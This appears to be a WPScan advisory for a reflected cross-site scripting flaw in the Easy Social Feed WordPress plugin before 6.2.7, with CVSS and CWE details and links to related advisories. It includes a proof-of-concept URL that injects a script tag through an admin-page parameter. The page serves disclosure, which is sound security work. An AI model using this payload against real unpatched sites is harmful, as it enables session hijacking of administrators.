Easy Social Feed < 6.2.7 – Reflected Cross-Site Scripting (XSS)

Description

The plugin does not sanitise and escape a parameter before outputting back in an admin dashboard page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged admin or editor

Proof of Concept

https://example.com/wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(/XSS/)</script>

Affects Plugins

easy-facebook-likebox

Fixed in 6.2.7

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

7.1 (high)

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

6dd00198-ef9b-4913-9494-e08a95e7f9a0

Timeline

Publicly Published

2021-08-16 (about 2 years ago)

Added

2022-01-08 (about 2 years ago)

Last Updated

2022-01-08 (about 2 years ago)

Other

Published

Title

Published

2021-09-09

Title

Spideranalyse <= 0.0.1 - Reflected Cross-Site Scripting

Published

2023-02-21

Title

Saan World Clock <= 1.8 - Contributor+ Stored XSS

Published

2021-12-03

Title

Survey Maker < 2.0.7 - Unauthenticated Store Cross-Site Scripting

Published

2020-07-18

Title

Careerfy < 4.3.0 - Unauthenticated Reflected Cross-Site Scripting

Published

2021-10-04

Title

Coming Soon, Under Construction & Maintenance Mode By Dazzler < 1.6.7 - Admin+ Stored Cross-Site Scripting